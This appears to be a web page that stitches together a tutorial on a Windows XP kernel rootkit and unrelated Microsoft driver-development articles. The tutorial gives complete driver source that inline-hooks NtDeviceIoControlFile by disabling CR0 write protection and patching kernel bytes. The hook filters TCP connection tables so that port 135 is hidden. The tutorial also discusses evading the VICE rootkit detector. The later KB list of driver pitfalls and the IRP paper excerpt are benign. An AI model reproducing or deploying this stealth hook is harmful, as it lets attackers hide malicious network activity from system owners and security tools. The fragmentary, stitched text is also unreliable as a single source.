        _emit 0xAA
        _emit 0x08
        _emit 0x00
}
//////////////////////////
__asm
{
forwArd:
    call bAck
}

This implements a complete call NtDeviceIoControlFile :>

__declspec(naked) my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle,
                                                           IN HANDLE Event OPTIONAL,
                                                           IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                           IN PVOID ApcContext OPTIONAL,
                                                           OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                           IN ULONG IoControlCode,
                                                           IN PVOID InputBuffer OPTIONAL,
                                                           IN ULONG InputBufferLength,
                                                           OUT PVOID OutputBuffer OPTIONAL,
                                                           IN ULONG OutputBufferLength
                                                           )
{ 

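    //NTSTATUS rc;                    Local variables cannot be used here, because the context in which NtDeviceIoControlFile gets called is unpredictable. Use globals instead (a driver loaded as a service resides in nonpaged pool), or allocate directly from nonpaged pool.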
    //TCP_REQUEST_QUERY_INFORMATION_EX req;
    //TCPAddrEntry* TcpTable;// = NULL;
    //TCPAddrExEntry* TcpExTable;// = NULL;
    //ULONG numconn;
    //ULONG i;
    __asm
    {

        push ebp
        mov ebp,esp
    }

    //DbgPrint("hooked\n");

    __asm
    {
        push OutputBufferLength
        push OutputBuffer
        push InputBufferLength
        push InputBuffer
        push IoControlCode
        push IoStatusBlock
        push ApcContext
        push ApcRoutine
        push Event
        push FileHandle
    }
    __asm
    {
        //int 3
        jmp forwArd
bAck:

    }

    __asm
    {
        //popfd
            //popad
        // exec missing instructions
            push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
//////////////////////////
    __asm
    {
forwArd:
        call bAck
    }
    /*
    __asm
        {
            mov esp,ebp
            pop ebp
            ret 0x28
    }
    */
    //DbgPrint("once here :>\n");

    __asm
    {
        mov rc,eax
    }

    if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){
        //return(rc);
        __asm
        {
            mov esp,ebp
            pop ebp
            mov eax,rc
            ret 0x28
        }
    } 

    //TcpTable = NULL;
    //TcpExTable = NULL;

    if( NT_SUCCESS( rc ) ) {
        req.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        req.ID.toi_entity.tei_instance = 0;
        req.ID.toi_class = INFO_CLASS_PROTOCOL;
        req.ID.toi_type = INFO_TYPE_PROVIDER;
        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);
            TcpTable = (TCPAddrEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ){
                if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) {
                    // check whether this is the last entry
                    if (i != numconn -1){
                        // source and destination overlap, so use RtlMoveMemory
                        RtlMoveMemory((TcpTable+i),(TcpTable+i+1),((numconn-i-1)*sizeof(TCPAddrEntry)));
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            }
            IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);
            //return(rc);
            __asm
            {
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        }
    } 

    //return(rc);
    __asm
    {
        mov esp,ebp
        pop ebp
        mov eax,rc
        ret 0x28
    }

}

A function declared __declspec(naked) cannot use a return statement, so we have to do that work ourselves :>

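Compared with patching the SSDT directly, the method above is somewhat stealthier, but VICE still detects it; it is too easy to spot. Of course the jmp can be replaced with an equivalent variant such as push xxxx followed by ret, among many other options. Besides such variants, the overwritten bytes can also be placed somewhere other than the function entry. For example, a few bytes starting at offset 8 of the hooked function can be rewritten as jmp xxxx. The position is not fixed and depends on the specific function. Take
NtDeviceIoControlFile,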

nt!NtDeviceIoControlFile:
805997c4 55               push    ebp
805997c5 8bec             mov     ebp,esp
805997c7 6a01             push    0x1
805997c9 ff752c           push    dword ptr [ebp+0x2c]
805997cc ff7528           push    dword ptr [ebp+0x28]
805997cf ff7524           push    dword ptr [ebp+0x24]
805997d2 ff7520           push    dword ptr [ebp+0x20]
805997d5 ff751c           push    dword ptr [ebp+0x1c]
805997d8 ff7518           push    dword ptr [ebp+0x18]
805997db ff7514           push    dword ptr [ebp+0x14]
805997de ff7510           push    dword ptr [ebp+0x10]
805997e1 ff750c           push    dword ptr [ebp+0xc]
805997e4 ff7508           push    dword ptr [ebp+0x8]
805997e7 e8e731ffff       call    nt!IopXxxControlFile (8058c9d3)
805997ec 5d               pop     ebp
805997ed c22800           ret     0x28
805997f0 0f862334ffff     jbe     nt!IopXxxControlFile+0x570 (8058cc19)
...

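Any of the push instructions above can be overwritten with jmp xxxx or a similar sequence, as long as execution never reaches the call, because once the call runs it has done a lot of work that is hard to undo.
For example, select: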
805997cc ff7528           push    dword ptr [ebp+0x28]
805997cf ff7524           push    dword ptr [ebp+0x24]
805997d2 ff7520           push    dword ptr [ebp+0x20]
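These 9 bytes are overwritten with 0xEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90, 0x90, where 11223344 is replaced by the address of our function. The overwritten region must cover a whole number of instructions.
By the time a call to NtDeviceIoControlFile jumps to our function, the following instructions have already executed: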
805997c4 55               push    ebp
805997c5 8bec             mov     ebp,esp
805997c7 6a01             push    0x1
805997c9 ff752c           push    dword ptr [ebp+0x2c]
so the corresponding inverse instructions have to be executed to restore the stack:

__asm
{
    add esp,8
    mov esp,ebp
    pop ebp
}

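Then, as in the original method, simulate the call to NtDeviceIoControlFile and replay the instructions that were overwritten.
On my own XP SP1 machine this passed VICE 2.0; combined with the jmp variations the result would probably be even better :>
The code is as follows: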

////////////inline_hook.c///////////////
#include <ntddk.h>
#include "hideport_hook_ZwDeviceIoControlFile.h"

NTSTATUS rc;
TCP_REQUEST_QUERY_INFORMATION_EX req;
TCPAddrEntry* TcpTable = NULL;
TCPAddrExEntry* TcpExTable = NULL;
ULONG numconn;
ULONG i;
//--------------------------------------------------------------------
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
                      IN HANDLE hFile,
                      IN HANDLE hEvent OPTIONAL,
                      IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
                      IN PVOID IoApcContext OPTIONAL,
                      OUT PIO_STATUS_BLOCK pIoStatusBlock,
                      IN ULONG DeviceIoControlCode,
                      IN PVOID InBuffer OPTIONAL,
                      IN ULONG InBufferLength,
                      OUT PVOID OutBuffer OPTIONAL,
                      IN ULONG OutBufferLength
                      );

NTSTATUS CheckFunctionBytesNtDeviceIoControlFile()
{
    int i=0;
    char *p = (char *)NtDeviceIoControlFile;

    //The beginning of the NtDeviceIoControlFile function
    //should match:
    //55  PUSH EBP
    //8BEC  MOV EBP, ESP
    //6A01  PUSH 01
    //FF752C PUSH DWORD PTR [EBP + 2C]

    char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C };

    while(i<8)
    {
        DbgPrint(" - 0x%02X ", (unsigned char)p[i]);
        DbgPrint("\n");
        if(p[i] != c[i])
        {
            return STATUS_UNSUCCESSFUL;
        }
        i++;
    }
    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
// naked functions have no prolog/epilog code - they are functionally like the
// target of a goto statement
__declspec(naked) NTAPI my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle,
                                                           IN HANDLE Event OPTIONAL,
                                                           IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                           IN PVOID ApcContext OPTIONAL,
                                                           OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                           IN ULONG IoControlCode,
                                                           IN PVOID InputBuffer OPTIONAL,
                                                           IN ULONG InputBufferLength,
                                                           OUT PVOID OutputBuffer OPTIONAL,
                                                           IN ULONG OutputBufferLength
                                                           )
{ 

    //NTSTATUS rc;
    //TCP_REQUEST_QUERY_INFORMATION_EX req;
    //TCPAddrEntry* TcpTable;// = NULL;
    //TCPAddrExEntry* TcpExTable;// = NULL;
    //ULONG numconn;
    //ULONG i;
    __asm
    {
        add esp,8
        mov esp,ebp
        pop ebp
    }

    __asm
    {
        push ebp
        mov ebp,esp
        pushad
    }

    //DbgPrint("hooked\n");

    __asm
    {
        push OutputBufferLength
        push OutputBuffer
        push InputBufferLength
        push InputBuffer
        push IoControlCode
        push IoStatusBlock
        push ApcContext
        push ApcRoutine
        push Event
        push FileHandle
    }
    __asm
    {
        //int 3
        jmp forwArd
bAck:

    }

    __asm
    {
        // exec missing instructions
            push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]
            push dword ptr [ebp+0x28]
            push dword ptr [ebp+0x24]
            push dword ptr [ebp+0x20]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
//////////////////////////
    __asm
    {
forwArd:
        call bAck
    }
    //DbgPrint("once here :>\n");
    __asm
    {
        mov rc,eax
    }

    if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){
        //return(rc);
        __asm
        {
            popad
            mov esp,ebp
            pop ebp
            mov eax,rc
            ret 0x28
        }
    } 

    if( NT_SUCCESS( rc ) ) {
        req.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        req.ID.toi_entity.tei_instance = 0;
        req.ID.toi_class = INFO_CLASS_PROTOCOL;
        req.ID.toi_type = INFO_TYPE_PROVIDER;
        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);
            TcpTable = (TCPAddrEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ){
                if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) {
                    // check whether this is the last entry
                    if (i != numconn -1){
                        RtlCopyMemory( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry)) );
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            }
            IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);
            //return(rc);
            __asm
            {
                popad
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        } 

        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry);
            TcpExTable = (TCPAddrExEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ) {
                if( ntohs(TcpExTable[i].tae_ConnLocalPort) == 135 ) {
                    if (i != numconn){
                        RtlCopyMemory( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry)) );
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            } 

            IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry);
            //return(rc);
            __asm
            {
                popad
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        }
    } 

    //return(rc);
    __asm
    {
        popad
        mov esp,ebp
        pop ebp
        mov eax,rc
        ret 0x28
    }

}
//--------------------------------------------------------------------
VOID DetourFunctionNtDeviceIoControlFile()
{
    char *actual_function = (char *)NtDeviceIoControlFile;
    unsigned long detour_address;
    unsigned long reentry_address;
    int i = 0;

    // assembles to jmp far 0008:11223344 where 11223344 is address of
    // our detour function, plus one NOP to align up the patch
    char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90,0x90 };

    // reenter the hooked function at a location past the overwritten opcodes
    // alignment is, of course, very important here
    reentry_address = ((unsigned long)NtDeviceIoControlFile) + 17; 

    detour_address = (unsigned long)my_function_detour_ntdeviceiocontrolfile;

    // stamp in the target address of the far jmp
    *( (unsigned long *)(&newcode[1]) ) = detour_address;

    // now, stamp in the return jmp into our detour
    // function
    for(i=0;i<200;i++){
        if( (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+1]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+2]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+3]))
        {
            // we found the address 0xAAAAAAAA
            // stamp it w/ the correct address
            *( (unsigned long *)(&((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) ) = reentry_address;
            break;
        }
    }

    //TODO, raise IRQL

    //overwrite the bytes in the kernel function
    //to apply the detour jmp
    _asm
    {
        CLI //disable interrupts
        MOV EAX, CR0 //move CR0 register into EAX
        AND EAX, NOT 10000H //disable WP bit
        MOV CR0, EAX //write register back
    }
    for(i=8;i < 17;i++)
    {
        actual_function[i] = newcode[i-8];
    }
    _asm
    {
        MOV EAX, CR0 //move CR0 register into EAX
        OR EAX, 10000H //enable WP bit
        MOV CR0, EAX //write register back
        STI //enable interrupt
    } 

    //TODO, drop IRQL
}

VOID UnDetourFunction()
{
    //TODO!
}
//--------------------------------------------------------------------
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    DbgPrint("My Driver Unloaded!\n");
    UnDetourFunction();
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DbgPrint("My Driver Loaded!");

    // TODO!! theDriverObject->DriverUnload = OnUnload;

    if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile()){
        DbgPrint("Match Failure on NtDeviceIoControlFile!\n");
        return STATUS_UNSUCCESSFUL;
    }

    DetourFunctionNtDeviceIoControlFile();

    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------

//////////hideport_hook_ZwDeviceIoControlFile.h/////////////
#include <ntddk.h>

//--------------------------------------------------------------------
NTSYSAPI
NTSTATUS
NTAPI
ZwDeviceIoControlFile(
                      IN HANDLE FileHandle,
                      IN HANDLE Event OPTIONAL,
                      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                      IN PVOID ApcContext OPTIONAL,
                      OUT PIO_STATUS_BLOCK IoStatusBlock,
                      IN ULONG IoControlCode,
                      IN PVOID InputBuffer OPTIONAL,
                      IN ULONG InputBufferLength,
                      OUT PVOID OutputBuffer OPTIONAL,
                      IN ULONG OutputBufferLength
                      );
NTSTATUS NTAPI
myZwDeviceIoControlFile(
                        IN HANDLE FileHandle,
                        IN HANDLE Event OPTIONAL,
                        IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                        IN PVOID ApcContext OPTIONAL,
                        OUT PIO_STATUS_BLOCK IoStatusBlock,
                        IN ULONG IoControlCode,
                        IN PVOID InputBuffer OPTIONAL,
                        IN ULONG InputBufferLength,
                        OUT PVOID OutputBuffer OPTIONAL,
                        IN ULONG OutputBufferLength
                        );
typedef NTSTATUS (NTAPI *ZWDEVICEIOCONTROLFILE)(
                                                IN HANDLE FileHandle,
                                                IN HANDLE Event OPTIONAL,
                                                IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                IN PVOID ApcContext OPTIONAL,
                                                OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                IN ULONG IoControlCode,
                                                IN PVOID InputBuffer OPTIONAL,
                                                IN ULONG InputBufferLength,
                                                OUT PVOID OutputBuffer OPTIONAL,
                                                IN ULONG OutputBufferLength
                                                );
//--------------------------------------------------------------------
// jiurl // from addrconv.cpp
#define ntohs(s) ( ( ((s) >> 8) & 0x00FF ) | ( ((s) << 8) & 0xFF00 ) )


// jiurl // from tcpioctl.h tdiinfo.h tdistat.h
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003

//* Structure of an entity ID.
typedef struct TDIEntityID {
    ULONG tei_entity;
    ULONG tei_instance;
} TDIEntityID; 

//* Structure of an object ID.
typedef struct TDIObjectID {
    TDIEntityID toi_entity;
    ULONG toi_class;
    ULONG toi_type;
    ULONG toi_id;
} TDIObjectID; 

#define CONTEXT_SIZE 16
//
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer
// in the DeviceIoControl request. This structure is passed as the
// InputBuffer.
//
struct tcp_request_query_information_ex {
    TDIObjectID ID; // object ID to query.
    ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context. Zeroed
    // for the first request.
}; 

typedef struct tcp_request_query_information_ex
TCP_REQUEST_QUERY_INFORMATION_EX,
*PTCP_REQUEST_QUERY_INFORMATION_EX; 

#define CO_TL_ENTITY 0x400
#define INFO_CLASS_PROTOCOL 0x200
#define INFO_TYPE_PROVIDER 0x100

//--------------------------------------------------------------------

typedef struct TCPSNMPInfo {
    ULONG tcpsi_RtoAlgorithm;
    ULONG tcpsi_RtoMin;
    ULONG tcpsi_RtoMax;
    ULONG tcpsi_MaxConn;
    ULONG tcpsi_ActiveOpens;
    ULONG tcpsi_PassiveOpens;
    ULONG tcpsi_AttemptFails;
    ULONG tcpsi_EstabResets;
    ULONG tcpsi_CurrEstab;
    ULONG tcpsi_InSegs;
    ULONG tcpsi_OutSegs;
    ULONG tcpsi_RetransSegs;
    ULONG tcpsi_unknown1;
    ULONG tcpsi_unknown2;
    ULONG tcpsi_numconn;
} TCPSNMPInfo; 

#define tcpRtoAlgorithm_other 1 // none of the following
#define tcpRtoAlgorithm_constant 2 // a constant rto
#define tcpRtoAlgorithm_rsre 3 // MIL-STD-1778, Appendix B
#define tcpRtoAlgorithm_vanj 4 // Van Jacobson's algorithm 

#define TCP_MIB_STATS_ID 1
#define TCP_MIB_ADDRTABLE_ENTRY_ID 0x101
#define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102


typedef struct TCPAddrEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
} TCPAddrEntry; 

#define tcpConnState_closed 1
#define tcpConnState_listen 2
#define tcpConnState_synSent 3
#define tcpConnState_synReceived 4
#define tcpConnState_established 5
#define tcpConnState_finWait1 6
#define tcpConnState_finWait2 7
#define tcpConnState_closeWait 8
#define tcpConnState_lastAck 9
#define tcpConnState_closing 10
#define tcpConnState_timeWait 11
#define tcpConnState_deleteTCB 12

typedef struct TCPAddrExEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
    ULONG pid;
} TCPAddrExEntry; 

November 5, 2005

INFO: Tips for Windows NT Driver Developers — Things to Avoid

Article ID : 186775
Last Review : July 27, 2004
Revision : 1.0
This article was previously published under Q186775

SUMMARY

Following are some tips for creating Windows NT device drivers. The tips presented apply to all technologies. You can also use this as a checklist for troubleshooting driver problems.

You need to have a basic knowledge of Windows NT architecture and some device driver development experience to use the information presented below effectively. For more information on device driver development, please see the Windows NT device driver kit (DDK), which is available through MSDN Professional membership.


MORE INFORMATION

Following is a list of things that developers should avoid when working with Windows NT device drivers:


1. Never return STATUS_PENDING from a dispatch routine without marking the I/O request packet (IRP) pending (IoMarkIrpPending).
2. Never call KeSynchronizeExecution from an interrupt service routine (ISR). It will deadlock your system.
3. Never set DeviceObject->Flags to both DO_BUFFERED_IO and DO_DIRECT_IO. It can confuse the system and eventually lead to fatal error. Also, never set METHOD_BUFFERED, METHOD_NEITHER, METHOD_IN_DIRECT or METHOD_OUT_DIRECT in DeviceObject->Flags, because these values are only used in defining IOCTLs.
4. Never allocate dispatcher objects from a paged pool. If you do, it will cause occasional system bugchecks.
5. Never allocate memory from paged pool, or access memory in paged pool, while running at IRQL >= DISPATCH_LEVEL. It is a fatal error.
6. Never wait on a kernel dispatcher object for a nonzero interval at IRQL >= DISPATCH_LEVEL. It is a fatal error.
7. Never call any function that causes the calling thread to wait directly or indirectly while executing at IRQL >= DISPATCH_LEVEL. It is a fatal error.
8. Never lower the interrupt request level (IRQL) below the level at which your top-level routine has been invoked.
9. Never call KeLowerIrql() if you haven’t called KeRaiseIrql().
10. Never stall a processor (KeStallExecutionProcessor) longer than 50 microseconds.
11. Never hold any spin locks longer than necessary. For better overall system performance, do not hold any system-wide spin locks longer than 25 microseconds.
12. Never call KeAcquireSpinLock and KeReleaseSpinLock, or KeAcquireSpinLockAtDpcLevel and KeReleaseSpinLockFromDpcLevel, while running at IRQL greater than DISPATCH_LEVEL.
13. Never release a spin lock that was acquired with KeAcquireSpinLock by calling KeReleaseSpinLockFromDpcLevel, because the original IRQL will not be restored.
14. Never call KeAcquireSpinLock and KeReleaseSpinLock or any other routine that uses an executive spin lock from an ISR or SynchCritSection routine(s).
15. Never forget to clear DO_DEVICE_INITIALIZING flag when you create a device object in a routine other than DriverEntry.
16. Never queue a deferred procedure call (DPC) object (using KeInsertQueueDpc) with multiple threads on different processors simultaneously. It can lead to fatal error.
17. Never deallocate a periodic timer from a CustomTimerDpc routine. You can deallocate nonperiodic timers from a DPC routine.
18. Never pass the same DPC pointer to KeSetTimer, or KeSetTimerEx (CustomTimerDpc) and KeInsertQueueDpc (CustomDpc), because it causes race conditions.
19. Never call IoStartNextPacket while holding a spin lock. It can deadlock your system.
20. Never call IoCompleteRequest while holding a spin lock. It can deadlock your system.
21. Never call IoCompleteRequest without setting the completion routine to NULL if your driver sets the completion routine.
22. Never forget to set the I/O status block in the IRP before calling IoCompleteRequest.
23. Never call IoMarkIrpPending after queuing an IRP or sending it to another driver (IoCallDriver). The IRP may be completed before the driver calls IoMarkIrpPending and a bugcheck might occur. For drivers with completion routines, the completion routines must call IoMarkIrpPending if Irp->PendingReturned is set.
24. Never touch an IRP after you have called IoCompleteRequest on it.
25. Never call IoCancelIrp on an IRP that is not owned by your driver unless you know that the IRP has not been completed yet.
26. Never call IoCancelIrp for the IRP that your dispatch routine is working on until your dispatch routine returns to caller.
27. Never call IoMakeAssociatedIrp to create IRPs for lower drivers from an intermediate driver. The IRP you get in your intermediate driver could be an associated IRP, and you cannot associate other IRPs to an already associated IRP.
28. Never call IoMakeAssociatedIrp on an IRP that is set up to perform buffered I/O.
29. Never simply dereference virtual pointers to device I/O registers and access them. Always use correct hardware abstraction layer (HAL) functions to access a device.
30. Never access IRP or device object fields from an ISR that may be modified from DISPATCH_LEVEL. On a symmetric multiprocessor system this can cause data corruption.
31. Never modify data while running at high-IRQL if that data may be written by low-IRQL code. Use the KeSynchronizeExecution routine.
32. Never acquire one of the driver’s own spin locks (if you have any) in your DispatchCleanup routine, before acquiring the system-wide cancel spin lock (IoAcquireCancelSpinLock). Following a consistent lock acquisition hierarchy throughout your driver is essential to avoiding potential deadlocks.
33. Never call IoAcquireCancelSpinLock in your cancel routine because it is always called with the system cancel spin lock held on its behalf.
34. Never forget to call IoReleaseCancelSpinLock before returning from a cancel routine.
35. Never use IRQL-based synchronization because this works only on single processor systems. Raising IRQL on one processor does not mask interrupts on other processors.
36. Never use RtlCopyMemory for overlapped memory address ranges. Use RtlMoveMemory.
37. Never assume page sizes are constant, even for a given CPU. Use PAGE_SIZE and other page related constants defined in header files to maintain portability.
38. Never access any registry keys other than Registry\Machine\Hardware and Registry\Machine\System from DriverEntry routine of a driver loaded in Boot\System Initialization phase.
39. Never create an Enum key for loading a driver under a driver’s registry key (Registry\Machine\System\CurrentControlSet\Services). The system creates this key dynamically.
40. Never attempt to initialize a physical device without claiming the necessary bus-relative I/O ports, memory ranges, interrupt, or direct memory access (DMA) channel/port hardware resources in the registry first.
41. Never call IoRegisterDriverReinitialization from your DriverEntry routine unless it returns STATUS_SUCCESS.
42. Never call KeSetEvent with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. This type of call causes a fatal page fault if your routine happens to be paged out between the calls to KeSetEvent and KeWait..Object(s).
43. Never call KeReleaseSemaphore with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. If your routine happens to be paged out between the calls to KeReleaseSemaphore and KeWait..Object(s), this type of a call causes a fatal page fault.
44. Never call KeReleaseMutex with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. If your routine happens to be paged out between the calls to KeReleaseMutex and KeWait..Object(s), this type of a call causes a fatal page fault.
45. Never call KeBugCheckEx or KeBugCheck from a retail Windows NT driver to bring down the system, unless the error encountered is a critical error which would corrupt system memory or eventually cause the system to bugcheck. Always try to handle error conditions gracefully.
46. Never assume that an IoTimer routine will be called precisely on a one-second boundary because the intervals at which any particular IoTimer routine is called ultimately depend on the resolution of the system clock.
47. Never call Win32 application programming interfaces (APIs) from a kernel-mode device driver.
48. Never use recursive functions that can cause the stack to overflow because the calling thread’s kernel-mode stack does not grow dynamically while it is running in kernel-mode.
49. Never use interrupt object pointers (PKINTERRUPT) to identify interrupts in an ISR that handles more than one interrupt, because the address of the interrupt object you get in the ISR will not always be the same as the one you got from IoConnectInterrupt. You should only use the ServiceContext value that you specify in IoConnectInterrupt to identify the current interrupting device.
50. Never unload a driver without clearing CustomTimerDpc (KeCancelTimer). If the DPC is fired after the driver is unloaded, it could hit nonexistent code and cause the system to bugcheck.
51. Never unload a driver until all the IRPs that have the I/O CompletionRoutine of the driver set in it are completed. If the IRP gets completed by the lower driver after your driver is unloaded, the system could try to execute the non-existent code and cause the system to crash.
52. Never enable device interrupt until your driver is ready to handle it. You should enable only after your driver is completely initialized, and it is safe for the system to touch the driver’s internal structures in ISR and DPC.
53. Never call outside of your driver while holding a spinlock because it can cause deadlock.
54. Never return any status other than STATUS_MORE_PROCESSING_REQUIRED from your I/O CompletionRoutine for an IRP created by your driver with IoBuildAsynchronousFsdRequest/IoAllocateIrp because the IRP is not prepared for completion related post-processing by the I/O manager. Such an IRP should be freed explicitly (IoFreeIrp) by the driver. If the IRP is not meant for reuse, it can be freed in the CompletionRoutine before returning status STATUS_MORE_PROCESSING_REQUIRED.
55. Never allocate an IRP with IoBuildSynchronousFsdRequest/IoBuildDeviceIoControlRequest in an Arbitrary thread context because the IRP remains associated with the thread (Irp->ThreadListEntry) until it is freed.
56. Never call IoInitializeIrp on an IRP that has been allocated with IoAllocateIrp with ChargeQuota parameter set to TRUE. When you allocate an IRP with ChargeQuota set to TRUE, the I/O manager keeps the information about the pool from which it allocated the memory for the IRP in the IRP’s internal flag.

When you call IoInitializeIrp on such an IRP, the allocation pool information is lost as this function blindly zeros the entire IRP. This leads to memory corruption when you free the IRP. Also, never reuse an IRP that comes from the IO manager. If you want to reuse an IRP, you should allocate your own by using IoAllocateIrp.
57. Never specify WaitMode as UserMode in KeWaitForSingleObject/KeWaitForMultipleObjects if the Object is allocated in the calling thread’s stack. The corollary of this is that if the Object being waited on is created in the function stack, you must specify KernelMode as the WaitMode to prevent the thread stack from being paged out.
58. Never acquire resources such as ERESOURCES and FastMutex(Unsafe) in the context of a user-mode thread without protecting the code in a critical section.

Because the acquisition of these resources does not raise the IRQL to APC_LEVEL, if the thread is suspended (done by queuing an APC) after it has acquired the resource, it could cause deadlock and compromise system security. Therefore, you should acquire such resources either by explicitly raising the IRQL to APC_LEVEL or in a critical section by calling KeEnterCriticalRegion.
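
Tip 36 is easy to illustrate outside the kernel. The sketch below uses the standard C memmove as a user-mode stand-in for RtlMoveMemory (an analogy only, not driver code); remove_entry and its parameters are hypothetical names. Deleting an element from the middle of an array shifts the tail down over itself, so the source and destination ranges overlap and only the move-style routine is well defined.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: delete table[index] by shifting the tail down one slot.
 * The source (table + index + 1) and destination (table + index) overlap, so
 * memmove, the user-mode counterpart of RtlMoveMemory, is required. memcpy,
 * like RtlCopyMemory, is not defined for overlapping ranges. */
size_t remove_entry(unsigned long *table, size_t count, size_t index)
{
    if (index >= count) {
        return count;                 /* nothing to remove */
    }
    memmove(table + index, table + index + 1,
            (count - index - 1) * sizeof(table[0]));
    return count - 1;                 /* new number of valid entries */
}
```

Calling remove_entry(t, 5, 1) on an array holding 10, 20, 30, 40, 50 leaves 10, 30, 40, 50 in the first four slots and returns 4.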


REFERENCES

MSDN Device Driver Design guide for Windows NT


APPLIES TO
Microsoft Win32 Device Driver Kit for Windows NT 3.51
Microsoft Win32 Device Driver Kit for Windows NT 4.0

Handling IRPs: What Every Driver Writer Needs to Know

Microsoft Corporation

July 2004

Applies to:
   Microsoft Windows 2000
   Microsoft Windows XP
   Microsoft Windows Server 2003
   Microsoft Windows codenamed "Longhorn"

Summary: This paper presents an overview of the I/O request packet (IRP) mechanism that is used in the Microsoft Windows family of operating systems. It is intended to provide driver writers with a greater understanding of how I/O works in the operating system, and how their drivers should manage and respond to I/O requests.

Contents

Introduction
Definition 1: IRP as a Container for an I/O Request
Definition 2: IRP as a Thread-Independent Call Stack
Passing an IRP to the Next Lower Driver
Completing an IRP
Synchronous I/O Responses
Asynchronous I/O Responses
Life Cycle of a File Object
Data Transfer Mechanisms
I/O Control Codes (IOCTLs)
Success, Error, and Warning Status for IRP Completion
Building IRPs
Debugging I/O Problems
Call to Action and Resources

Introduction

